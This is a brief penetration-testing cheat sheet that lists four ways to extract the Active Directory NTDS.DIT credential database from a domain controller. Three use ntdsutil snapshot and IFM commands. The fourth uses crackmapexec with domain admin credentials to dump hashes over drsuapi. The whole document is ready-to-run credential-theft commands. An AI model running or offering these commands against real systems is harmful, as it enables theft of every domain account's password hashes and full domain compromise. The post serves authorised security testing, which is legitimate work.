Internal Infrastructure Pentest - Extracting NTDS.DIT File

less than 1 minute read

Method1:

ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:\temp\ntds.dit"
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit

Method2:

C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit

Method3:

ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q q

Method4:

crackmapexec.py -u DA_USERNAME -p DA_PASSWORD -d FQDN_DOMAIN DOMAIN_IP --ntds drsuapi